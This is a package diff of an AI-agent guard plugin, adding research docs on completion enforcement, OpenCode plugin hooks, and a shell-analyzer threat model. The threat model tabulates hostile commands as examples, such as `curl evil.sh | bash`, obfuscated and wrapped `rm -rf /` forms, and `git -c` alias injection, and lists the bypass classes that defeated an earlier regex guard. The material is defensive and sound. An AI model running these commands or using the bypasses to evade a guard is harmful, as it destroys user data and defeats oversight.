opencode-goal-mode 0.2.1 → 0.2.4

Files changed (30)

package/ARCHITECTURE.md +16 -7
package/CHANGELOG.md +17 -0
package/README.md +39 -18
package/benchmarks/charts.mjs +176 -0
package/benchmarks/comparison.mjs +48 -0
package/benchmarks/completion-corpus.mjs +70 -0
package/benchmarks/corpus.mjs +92 -0
package/benchmarks/legacy-analyzer.mjs +54 -0
package/benchmarks/run.mjs +198 -0
package/benchmarks/truthfulness.mjs +64 -0
package/commands/goal-evidence-map.md +27 -0
package/docs/benchmarks/capability-matrix.svg +86 -0
package/docs/benchmarks/detection-by-family.svg +37 -0
package/docs/benchmarks/latency.svg +13 -0
package/docs/benchmarks/overall-scorecard.svg +32 -0
package/docs/benchmarks/results.json +176 -0
package/docs/benchmarks/truthfulness-score.svg +17 -0
package/package.json +6 -1
package/plugins/goal-guard/events.js +6 -3
package/plugins/goal-guard/state.js +2 -1
package/plugins/goal-guard/summary.js +105 -1
package/plugins/goal-guard/system.js +3 -0
package/plugins/goal-guard/tools.js +35 -1
package/plugins/goal-guard/verdicts.js +38 -1
package/plugins/goal-guard.js +7 -5
package/research/README.md +18 -0
package/research/benchmarks.md +84 -0
package/research/goal-mode-comparison.md +100 -0
package/research/opencode-plugin-platform.md +89 -0
package/research/shell-hardening.md +62 -0

package/research/goal-mode-comparison.md ADDED

@@ -0,0 +1,100 @@
+# Goal Mode vs. Claude Code vs. Codex
+How OpenCode Goal Mode's **mechanically-enforced** goal discipline compares to
+Anthropic's Claude Code and OpenAI's Codex. Sourced from Claude Code docs
+(`https://docs.anthropic.com/en/docs/claude-code/hooks` and `/security`) and
+OpenAI Codex docs (`https://developers.openai.com/codex/cli` and `/cloud`),
+cross-checked against this plugin's source. The emphasis throughout is
+*mechanical enforcement* — what the harness guarantees — versus *prompt-driven*
+behavior the model is asked to do.
+## The distinction that matters
+All three tools run a **model-driven** agentic loop. Public docs reviewed do not
+describe a default mechanical proof that forces the model to keep working until
+all project-specific acceptance criteria are externally verified. Goal Mode's
+loop is prompt-only too.
+What separates the three is what happens at the **completion boundary** and the
+**tool boundary**:
+- **Claude Code** has the richest first-party *mechanical* surface
+  (PreToolUse/Stop/PostToolUse hooks, permission deny rules, sandboxing) — but
+  review and completion enforcement are **opt-in**, requiring user-authored
+  hooks. Out of the box, review is prompt-driven and the model stops when it
+  judges the work done.
+- **Codex** has approval modes, local code review, and cloud environments that
+  isolate work from the user's machine — genuinely strong mode-level boundaries
+  Goal Mode does not claim — but public docs do not describe a harness-level
+  `Goal Completed` blocker or stale-review invalidation invariant.
+- **Goal Mode** ships a coherent **completion contract** and **command guard**
+  enforced at the harness layer by default, for the goal-completion use case.
+## Capability matrix
+See `docs/benchmarks/capability-matrix.svg` for the visual. Levels: **Enforced**
+(guaranteed by the harness), **Partial** (possible but opt-in / mode-level),
+**Prompt-only** (the model's judgment), **None**.
+| Capability | Goal Mode | Claude Code | Codex |
+| --- | --- | --- | --- |
+| Autonomous goal loop | Prompt-only | Partial | Partial |
+| Review gate before "done" | **Enforced** | Partial (Stop hook) | Prompt-only |
+| Contextual specialist reviews | **Enforced** | Prompt-only | Prompt-only |
+| Stale-review invalidation on edit | **Enforced** | None | None |
+| Completion-claim enforcement | **Enforced** | Partial (Stop hook) | None |
+| Destructive-command blocking | **Enforced** (tokenizer) | Partial ("fragile") | Partial (sandbox) |
+| Remote-exec (`curl \| sh`) blocking | **Enforced** | Partial | Partial (sandbox) |
+| Enforcement state survives restart | **Enforced** | Partial (transcript) | Partial (transcript) |
+| State survives compaction | **Enforced** | Partial | Partial |
+| Custom enforcement hooks/tools | **Enforced** | **Enforced** | Partial |
+## Where Goal Mode is uniquely strong
+1. **Mechanical completion contract.** Goal Mode intercepts the finished
+   assistant message (`experimental.text.complete`) and rewrites a premature
+   `Goal Completed` to `Goal Not Completed` unless the message *starts with* the
+   marker, carries a `Review cycles: N` line with `N > 0`, `N` exactly equals the
+   recorded counter, and **zero** required gates are missing or stale. Because the
+   rewrite is driven by **recorded state**, the model cannot talk its way to
+   "done" in prose. Prompt-based goal-following, by contrast, judges completion
+   from what the model has already printed.
+2. **Stale-on-edit gate invalidation via a monotonic integer counter.** A
+   reviewer gate counts only when its latest `PASS` has a `seq` strictly greater
+   than `lastEditSeq`. Any edit — file write, mutating bash command, or a
+   subagent `file.edited` event — bumps the counter, so a `PASS` can never be
+   credited against an edit it did not actually follow. Integer ordering means
+   two same-millisecond events can't tie. The public Claude Code and Codex docs
+   reviewed do not describe an equivalent "an edit invalidates prior approvals"
+   invariant.
+3. **Contextual specialist reviews are required, not suggested.** A whole-word
+   keyword scan of the goal text + Goal Contract + changed-file names selects
+   specialists (auth/token → security, api/schema → api, migration/sql → data,
+   perf/latency → performance) and makes them a precondition for completion,
+   sticky so a later context truncation cannot silently drop a required gate.
+4. **Destructive-command blocking by a real shell tokenizer.** The guard unwraps
+   `sudo`/`env`/`timeout`/`xargs`, recurses into `$(…)`/backticks and
+   `bash -c`/`eval`, resolves `/bin/rm` to its basename, parses `git -C` and
+   weaponized `git -c alias='!rm -rf /'`, and inspects interpreter sinks. Claude
+   Code's own docs warn that Bash argument-matching can be **"fragile"** for
+   hard enforcement and recommend permissions for hard allow/deny policy; these
+   classes are not unwrapped unless a user-authored PreToolUse hook does it.
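The first three items above can be sketched in a few functions. This is a minimal illustration, not the plugin's code: the state shape (`reviewCycles`, `lastEditSeq`, `requiredGates`, `gates`) and the function names are assumptions chosen to mirror the prose, and the "sticky" behavior of required gates is not modeled.

```javascript
// Illustrative sketch only. The state shape and all function names are
// assumptions that mirror the prose above, not the plugin's implementation.

// Item 3: whole-word keyword scan that selects required specialist gates.
const SPECIALIST_KEYWORDS = {
  security: ["auth", "token"],
  api: ["api", "schema"],
  data: ["migration", "sql"],
  performance: ["perf", "latency"],
};

function selectSpecialists(text) {
  const required = [];
  for (const [gate, words] of Object.entries(SPECIALIST_KEYWORDS)) {
    const pattern = new RegExp(`\\b(${words.join("|")})\\b`, "i");
    if (pattern.test(text)) required.push(gate);
  }
  return required;
}

// Item 2: a gate counts only if its latest PASS is strictly newer than the last edit.
function isGateFresh(gate, lastEditSeq) {
  return Boolean(gate) && gate.verdict === "PASS" && gate.seq > lastEditSeq;
}

// Item 1: decide from recorded state whether a "Goal Completed" claim may stand.
function checkCompletion(text, state) {
  if (!text.startsWith("Goal Completed")) {
    return { ok: false, reason: "marker not at start" };
  }
  const match = text.match(/^Review cycles:\s*(\d+)\s*$/m);
  if (!match) return { ok: false, reason: "no Review cycles line" };
  const claimed = Number(match[1]);
  if (claimed <= 0 || claimed !== state.reviewCycles) {
    return { ok: false, reason: "review-cycle count mismatch" };
  }
  const missingOrStale = state.requiredGates.filter(
    (name) => !isGateFresh(state.gates[name], state.lastEditSeq),
  );
  if (missingOrStale.length > 0) {
    return { ok: false, reason: `missing or stale: ${missingOrStale.join(", ")}` };
  }
  return { ok: true };
}

// Rewrite a premature completion claim; leave everything else untouched.
function enforce(text, state) {
  if (checkCompletion(text, state).ok || !text.includes("Goal Completed")) return text;
  return text.replace("Goal Completed", "Goal Not Completed");
}
```

Because `isGateFresh` compares integers with a strict `>`, a `PASS` recorded at the same sequence number as an edit never counts, which is the property the monotonic counter is meant to provide.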
+## Honest caveats
+- **The autonomous loop is prompt-only**, like Claude's and Codex's. What is
+  mechanical is the *completion gate* and the *command guard*, not the model's
+  decision to keep working.
+- **Codex's isolated execution model is a stronger boundary** than a tool-layer
+  classifier where it applies. Goal Mode's guard falls back to "not blocked" on a
+  parse failure (deferring to the host's permission rules); it is
+  defense-in-depth, not a jail.
+- **Claude Code can do equivalent enforcement** when a user wires Stop/PreToolUse
+  hooks themselves. Goal Mode's advantage is that a coherent set ships working
+  out of the box for this use case.
+- Gate freshness is only as trustworthy as the reviewer subagents' verdicts. The
+  guard records *that* a fresh `PASS` exists with the right sequence; it cannot
+  verify the reviewer reasoned correctly.

package/research/opencode-plugin-platform.md ADDED

@@ -0,0 +1,89 @@
+# OpenCode plugin platform — verified reference
+Facts verified against `@opencode-ai/plugin@1.15.13` (the installed type
+definitions) and the `sst/opencode` source at tag `v1.15.13`. This is the
+pinned runtime reference the `goal-guard` plugin is engineered against; the npm
+latest was `1.16.2` when this document was refreshed, so claims below are
+version-scoped unless explicitly called out as current-docs behavior.
+Primary sources: OpenCode schema (`https://opencode.ai/config.json`), OpenCode
+config/agents/plugins docs (`https://opencode.ai/docs/config/`,
+`https://opencode.ai/docs/agents/`, `https://opencode.ai/docs/plugins/`),
+plugin source at `https://raw.githubusercontent.com/sst/opencode/v1.15.13/`,
+and npm metadata for `@opencode-ai/plugin`.
+## Plugin discovery
+- Auto-discovery glob is `{plugin,plugins}/*.{ts,js}` — **single level only**
+  (`config/plugin.ts`). Files directly under `plugins/` become plugins; files
+  in **subdirectories** (e.g. `plugins/goal-guard/state.js`) are **not**
+  auto-loaded. This is what lets Goal Mode ship a multi-file plugin: the entry
+  `plugins/goal-guard.js` imports its modules from `plugins/goal-guard/`
+  relatively, and those modules are never treated as standalone plugins.
+- Scanned directories include `~/.config/opencode`, every `.opencode` from the
+  session directory up to the worktree, `~/.opencode`, and `$OPENCODE_CONFIG_DIR`.
+- TypeScript plugins load natively (Bun); no build step is required.
+- The config `plugin` array also accepts npm package names and `["spec", options]`
+  tuples; the second tuple element arrives as the plugin factory's second arg.
+  Auto-discovered plugins receive `options === undefined`.
+- Current OpenCode docs prefer plural config directories such as
+  `.opencode/plugins/`; singular directories are backward-compatible.
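To make the single-level rule concrete, the glob can be approximated with a regular expression. This is a sketch of the matching rule only, not OpenCode's own matcher. It assumes paths are relative to a scanned config directory and use `/` separators, and `plugin/legacy.ts` is a made-up file name.

```javascript
// Approximates the single-level glob `{plugin,plugins}/*.{ts,js}` with a regex.
// Assumption: paths are relative to a scanned config directory and use "/".
const AUTO_DISCOVERY = /^(plugin|plugins)\/[^/]+\.(ts|js)$/;

function isAutoDiscovered(relativePath) {
  return AUTO_DISCOVERY.test(relativePath);
}

const candidates = [
  "plugins/goal-guard.js", // entry file: loaded as a plugin
  "plugins/goal-guard/state.js", // helper module: only reachable via import
  "plugin/legacy.ts", // singular directory (hypothetical file), still matched
];
for (const file of candidates) {
  console.log(file, "->", isAutoDiscovered(file) ? "plugin" : "not auto-loaded");
}
```

The `[^/]+` segment is what excludes subdirectories, so helper modules under `plugins/goal-guard/` never become standalone plugins.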
+## Hooks (the ones Goal Mode uses)
+| Hook | Input → Output | Notes |
+| --- | --- | --- |
+| `chat.message` | `{sessionID, agent?}` → `{message, parts}` | Captures the user's goal text. |
+| `chat.params` | `{sessionID, agent, model, …}` → params | Tracks the current agent. |
+| `experimental.chat.system.transform` | `{sessionID?, model}` → `{system: string[]}` | Inject system-prompt strings. |
+| `tool.execute.before` | `{tool, sessionID, callID}` → `{args}` | **Throwing blocks the tool** and the thrown message becomes the tool's error result shown to the model. `args` are on the **output**, not the input. Mutate `output.args` in place. |
+| `tool.execute.after` | `{tool, sessionID, callID, args}` → `{title, output, metadata}` | The `task` tool's output wraps the subagent text in `<task><task_result>…</task_result></task>`. |
+| `experimental.text.complete` | `{sessionID, messageID, partID}` → `{text}` | The returned `text` **is persisted** to the transcript. No `agent` field — gate on tracked `active` state. |
+| `experimental.session.compacting` | `{sessionID}` → `{context: string[], prompt?}` | Append preservation context. |
+| `event` | `{event}` | Directory-scoped; `file.edited`, `session.idle`, etc. `file.edited` carries `{file}` and **no** sessionID. |
+| `tool` | `{ [id]: ToolDefinition }` | Custom tools; the object key is the tool name verbatim. `tool.schema` is zod. |
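The `tool.execute.before` row is the one a guard depends on, so a minimal sketch may help. It assumes the bash tool exposes its command as `args.command`. The option name `blockDestructive` and the helper `looksDestructive` are hypothetical, and the regex is a deliberately naive stand-in for a real analyzer.

```javascript
// Sketch only. Assumptions: the bash tool exposes its command as `args.command`,
// and `blockDestructive` is a hypothetical option name. `looksDestructive` is a
// deliberately naive stand-in for a real analyzer.
const looksDestructive = (command) => /^\s*rm\s+-\w*[rf]/.test(command);

const GuardSketch = async (_input, options) => {
  // Auto-discovered plugins receive `options === undefined`.
  const enabled = options?.blockDestructive ?? true;
  return {
    "tool.execute.before": async (input, output) => {
      if (!enabled || input.tool !== "bash") return;
      // `args` are on the output object and may be mutated in place.
      const command = String(output.args.command ?? "").trim();
      output.args.command = command;
      if (looksDestructive(command)) {
        // Throwing blocks the tool; the message becomes the tool's error result.
        throw new Error(`Blocked destructive command: ${command}`);
      }
    },
  };
};
```

Returning normally lets the call proceed with whatever `output.args` now holds, so the same hook can both normalize and veto.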
+## Critical version-specific facts
+- **`permission.ask` is dormant in 1.15.13.** The hook is declared in the type
+  definitions but has **zero trigger sites** in the runtime. A guard must
+  enforce via `tool.execute.before` throws, not this hook.
+- **Subagent `task` runs in a NEW child session.** The `task` tool's
+  before/after fire in the **parent** session with the subagent's final text;
+  the subagent's own internal tool calls fire under the **child** sessionID.
+  This is why Goal Mode records review verdicts via the task path (parent) and
+  treats agent-path verdicts as same-session only.
+- **Agent frontmatter** (`{agent,agents}/**/*.md`, recursive): `model`,
+  `variant`, `temperature`, `top_p`, `prompt`, `description`, `mode`
+  (`primary|subagent|all`), `hidden`, `disable`, `color` (hex or theme literal),
+  `steps`, `options`, `permission`. **Unknown keys are silently folded into
+  `options`** — so a typo'd key disappears rather than erroring.
+  `ext_mcp_server_trust` is **not a real key**.
+- **Command frontmatter** (`{command,commands}/**/*.md`): `template`,
+  `description`, `agent`, `model`, `variant`, `subtask`. Unlike agents, a
+  **command with an unknown key throws** a parse error.
+- **Current built-in agents include `build`, `plan`, `general`, `explore`, and
+  `scout`.** Goal Mode allows delegation to the stock `explore`, `general`, and
+  `scout` subagents from its primary agent.
+- **Permissions** are last-matching-rule-wins; `deny` from any scope beats
+  `allow`. Per-tool pattern maps are supported for `bash`, `task`,
+  `external_directory`, etc.
+## State persistence
+There is **no** plugin key/value store, so plugins persist their own JSON. The
+XDG state dir (`$XDG_STATE_HOME/opencode/…`, default `~/.local/state`) is the
+durable location for it, as opposed to a disposable cache directory.
+`PluginInput.directory` is the session working dir; `PluginInput.worktree` is
+the git worktree root (a stable per-project key).
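One way a plugin might persist its own JSON under the XDG state dir, keyed by worktree, is sketched below. The `goal-guard` subdirectory, the hashed file name, and the state shape are assumptions made for illustration and not the plugin's actual layout.

```javascript
// Sketch under assumptions: the "goal-guard" subdirectory, the hashed file name,
// and the state shape are hypothetical. Node built-ins are loaded with dynamic
// import() so the snippet works in both ESM and CommonJS files.

async function stateFilePath(worktree, env = process.env) {
  const path = await import("node:path");
  const os = await import("node:os");
  const { createHash } = await import("node:crypto");
  const base = env.XDG_STATE_HOME || path.join(os.homedir(), ".local", "state");
  // Hash the worktree root so each project gets a stable, filesystem-safe key.
  const key = createHash("sha256").update(worktree).digest("hex").slice(0, 16);
  return path.join(base, "opencode", "goal-guard", `${key}.json`);
}

async function saveState(worktree, state, env = process.env) {
  const fs = await import("node:fs/promises");
  const path = await import("node:path");
  const file = await stateFilePath(worktree, env);
  await fs.mkdir(path.dirname(file), { recursive: true });
  // Write to a temp file, then rename, so a crash never leaves a half-written file.
  const tmp = `${file}.${process.pid}.tmp`;
  await fs.writeFile(tmp, JSON.stringify(state, null, 2));
  await fs.rename(tmp, file);
}

async function loadState(worktree, env = process.env) {
  const fs = await import("node:fs/promises");
  try {
    return JSON.parse(await fs.readFile(await stateFilePath(worktree, env), "utf8"));
  } catch {
    return null; // Missing or corrupt state: the caller starts fresh.
  }
}
```

Keying on `worktree` rather than `directory` means sessions started from different subdirectories of the same checkout share one state file.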
+## Pitfalls
+- Hooks run sequentially across plugins in load order, awaited one by one — a
+  throw in a `chat.*`/`text.complete` hook can break the turn, so keep them
+  defensive (Goal Mode wraps each in try/catch).
+- A failed dynamic `import()` of a plugin file is cached for the process; editing
+  a plugin requires restarting OpenCode.
+- `experimental.text.complete` runs at text-end; streaming deltas already
+  emitted the original text, so the rewrite is a final-form correction, not a
+  pre-display redaction.
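The first pitfall suggests a small wrapper. The helper below is hypothetical (the name `defensive` and its options are not from the plugin). It swallows and logs errors from ordinary hooks while leaving `tool.execute.before` free to throw, since that throw is how a guard blocks a tool.

```javascript
// Hypothetical helper: wraps hooks so an internal bug degrades to a no-op
// instead of breaking the turn. Hooks listed in `rethrow` are left unwrapped
// because their throws are intentional (a guard blocks a tool by throwing).
function defensive(hooks, { rethrow = ["tool.execute.before"], log = console.error } = {}) {
  const wrapped = {};
  for (const [name, fn] of Object.entries(hooks)) {
    if (typeof fn !== "function" || rethrow.includes(name)) {
      wrapped[name] = fn;
      continue;
    }
    wrapped[name] = async (...args) => {
      try {
        return await fn(...args);
      } catch (err) {
        log(`[${name}] hook failed:`, err);
        return undefined;
      }
    };
  }
  return wrapped;
}
```

A plugin factory could return `defensive({ ...hooks })` so every `chat.*` and `text.complete` handler is covered without repeating the try/catch in each one.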

package/research/shell-hardening.md ADDED

@@ -0,0 +1,62 @@
+# Shell-analyzer threat model
+The destructive-command guard is the plugin's most security-sensitive component.
+This document records the threat model: the bypass classes the original
+regex-based guard missed, and how the quote-aware tokenizer
+(`plugins/goal-guard/shell.js`) closes each. Every class below is covered by a
+test in `tests/shell.test.mjs` and measured in `npm run bench`.
+## Why regexes failed
+The original guard matched boundary-anchored regexes (`(^|&&|;|\|\|)\s*rm …`)
+against the raw command string. That design is fundamentally bypassable because
+a single regex cannot model shell quoting, command substitution, wrappers, or
+interpreters. On the benchmark corpus it detected **20.8%** of destructive
+commands while wrongly blocking **21.7%** of benign ones (for example,
+`git checkout -b feature`).
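A few lines of JavaScript show the failure mode. The pattern below is an assumed reconstruction of the shape of a boundary-anchored `rm` regex. The source elides the rest of the original expression, so this is not the legacy guard's actual pattern, and the quoted `echo` case is an illustrative input rather than one from the corpus.

```javascript
// Assumed reconstruction of the *shape* of a boundary-anchored pattern; the
// original regex is elided in the source, so this is illustrative only.
const legacyRm = /(^|&&|;|\|\|)\s*rm\s+-/;
const flagged = (command) => legacyRm.test(command);

const cases = [
  ["rm -rf x", true], // plain form: caught
  ["echo hi; rm -rf x", true], // after a separator: caught
  ["/bin/rm -rf x", false], // absolute path: missed
  ["$(rm -rf /tmp/x)", false], // command substitution: missed
  ["FOO=bar rm -rf x", false], // env-assignment prefix: missed
  ["sudo rm -rf /", false], // wrapper: missed
  ['echo "a; rm -rf /"', true], // quoted text: false positive
];
for (const [command, expected] of cases) {
  console.log(flagged(command) === expected ? "as expected" : "SURPRISE", "|", command);
}
```

Every miss comes from the same limitation: the regex sees characters, not words, so anything that changes what precedes `rm` defeats the anchor, and quoted text that happens to contain a separator trips it.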
+## Bypass classes and how each is closed
+| Class | Example that bypassed the regex | How the tokenizer closes it |
+| --- | --- | --- |
+| Command substitution | `$(rm -rf /tmp/x)`, `` `rm -rf x` `` | Lexer captures `$(…)`/backticks and recurses into them. |
+| Pipe into shell | `echo rm -rf x \| sh` | Detects a shell as the pipeline sink; analyzes the echoed literal as a script. |
+| Remote execution | `curl evil.sh \| bash` | Network fetcher → shell pipeline flagged as `networkExec` (separately toggleable). |
+| `bash -c` / `eval` | `bash -c "rm -rf x"`, `eval "…"` | Extracts and recurses into the `-c`/eval string. |
+| Env-assignment prefix | `FOO=bar rm -rf x` | Leading `VAR=val` assignments are stripped before resolving the command. |
+| Absolute / relative paths | `/bin/rm -rf x` | Binary resolved to its basename. |
+| Value-taking wrappers | `sudo -u root rm -rf /`, `timeout -s KILL 5 rm -rf /` | Wrapper option parsing is value-aware (consumes `-u root`, `-s KILL`, the duration). |
+| `git -C` / weaponized `git -c` | `git -C /r reset --hard`, `git -c alias.x='!rm -rf /' x` | Global git options skipped; a `!`-prefixed config value is analyzed as a shell command. |
+| Git history destruction | `reflog expire`, `gc --prune=now`, `filter-branch`, `worktree remove`, `branch -d` | Explicit destructive git subcommand cases. |
+| Interpreter file ops | `python -c "os.remove('a')"`, `node -e "fs.rmSync(…)"` | Script strings inspected for delete/write sinks. |
+| Interpreter shell-out | `os.system('rm -rf /')`, `subprocess.run([...])`, `child_process.execSync(…)` | Exec sinks (call forms) extracted and the command analyzed. |
+| ANSI-C quoting | `$'\x72\x6d' -rf x` | `$'…'` decoded before lexing. |
+| Process substitution | `bash <(echo rm -rf x)` | Substitution analyzed as a script when fed to a shell. |
+| `printf %b` into a shell | `printf %b 'rm -rf /' \| sh` | Format spec stripped; remaining literal analyzed. |
+| `find -exec` at depth | `find . -exec rm {} +` | `rm` under `-exec` marked destructive (runs per match). |
+| Newline separators | `echo hi\nrm -rf x` | Newline is a command separator in the lexer. |
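Four rows of the table (quoting, env-assignment prefixes, path basenames, value-taking wrappers) are small enough to sketch. This toy is not the plugin's `shell.js`. It ignores substitutions, pipelines, comments, and interpreters, and the wrapper option sets are a partial guess at the options that take a value.

```javascript
// Toy sketch, NOT the plugin's shell.js: handles quoting, VAR=val prefixes,
// path basenames, and three value-taking wrappers. Everything else is ignored.

// Wrapper name -> options that consume the following word as their value.
const WRAPPERS = new Map([
  ["sudo", new Set(["-u", "-g"])],
  ["env", new Set(["-u"])],
  ["timeout", new Set(["-s", "-k"])],
]);

// Split a command into words, honoring single and double quotes.
function tokenize(command) {
  const words = [];
  let current = "";
  let quote = null;
  let started = false;
  for (const ch of command) {
    if (quote) {
      if (ch === quote) quote = null;
      else current += ch;
    } else if (ch === "'" || ch === '"') {
      quote = ch;
      started = true;
    } else if (/\s/.test(ch)) {
      if (started) words.push(current);
      current = "";
      started = false;
    } else {
      current += ch;
      started = true;
    }
  }
  if (quote) throw new SyntaxError("unterminated quote");
  if (started) words.push(current);
  return words;
}

// Strip assignments and wrappers, then report the real command's basename.
function resolveCommand(words) {
  let i = 0;
  while (i < words.length) {
    const word = words[i];
    if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(word)) {
      i += 1; // leading VAR=val assignment
      continue;
    }
    const name = word.split("/").pop(); // "/bin/rm" -> "rm"
    const valueOptions = WRAPPERS.get(name);
    if (!valueOptions) return { name, args: words.slice(i + 1) };
    i += 1;
    while (i < words.length && words[i].startsWith("-")) {
      i += valueOptions.has(words[i]) ? 2 : 1; // consume "-u root", "-s KILL"
    }
    if (name === "timeout") i += 1; // the duration operand
  }
  return null;
}

function isDestructive(command) {
  const resolved = resolveCommand(tokenize(command));
  if (!resolved) return false;
  return resolved.name === "rm" && resolved.args.some((arg) => /^-\w*[rRf]/.test(arg));
}
```

With this, `isDestructive("timeout -s KILL 5 rm -rf /")` is true while `isDestructive('echo "rm -rf /"')` is false, because the quoted string arrives as a single argument to `echo` rather than as a command.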
+## False positives the tokenizer also removed
+A guard that over-blocks is a guard that gets turned off. The tokenizer clears
+the regex guard's false positives:
+- `git checkout -b feature` / `git switch -c topic` — branch creation, not a
+  discard.
+- `echo "rm -rf /"` / `printf 'do not run rm -rf'` — quoted text is inert.
+- `grep 'git reset' .` / `cat notes.txt # git reset explained` — comments and
+  search terms are not commands.
+- `true #; rm -rf x` — `#` starts a comment.
+- `python -c 'print(platform.system())'` — a bare `system` mention is not a
+  shell-out (exec sinks require a call form; the analyzer fails open when no
+  literal command can be extracted).
+- `git config --get user.email` — read-only queries don't dirty the session.
+## Design principle: fail open, defense-in-depth
+The analyzer is a **tool-layer classifier**, not an OS sandbox. On a parse
+failure or an un-analyzable dynamic command it returns "not blocked" and defers
+to OpenCode's own permission rules. It is one layer of defense-in-depth that
+catches the overwhelmingly common destructive forms an agent emits — not a
+security jail. Over-blocking benign work is treated as a real cost, which is why
+the false-positive rate is held at zero on the corpus.
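The fail-open rule reduces to a try/catch around the analyzer. In this sketch `analyze` is a hypothetical stand-in that throws on unbalanced quotes, and the verdict object shape is an assumption.

```javascript
// Hypothetical analyzer: throws on input it cannot parse. The real analyzer
// is far more thorough; only the error-handling shape matters here.
function analyze(command) {
  const quotes = (command.match(/["']/g) || []).length;
  if (quotes % 2 !== 0) throw new SyntaxError("unterminated quote");
  return { destructive: /^\s*rm\s+-\w*[rf]/.test(command) };
}

function guard(command, analyzer = analyze) {
  try {
    const verdict = analyzer(command);
    return verdict.destructive
      ? { blocked: true, reason: "destructive command" }
      : { blocked: false, reason: "analyzed, benign" };
  } catch (err) {
    // Fail open: defer to the host's permission rules instead of blocking.
    return { blocked: false, reason: `unanalyzable: ${err.message}` };
  }
}
```

The trade-off is explicit in the `catch` branch: an unparseable command is allowed through to the next layer rather than blocked, which keeps the false-positive rate down at the cost of relying on the host's permission rules for the hard cases.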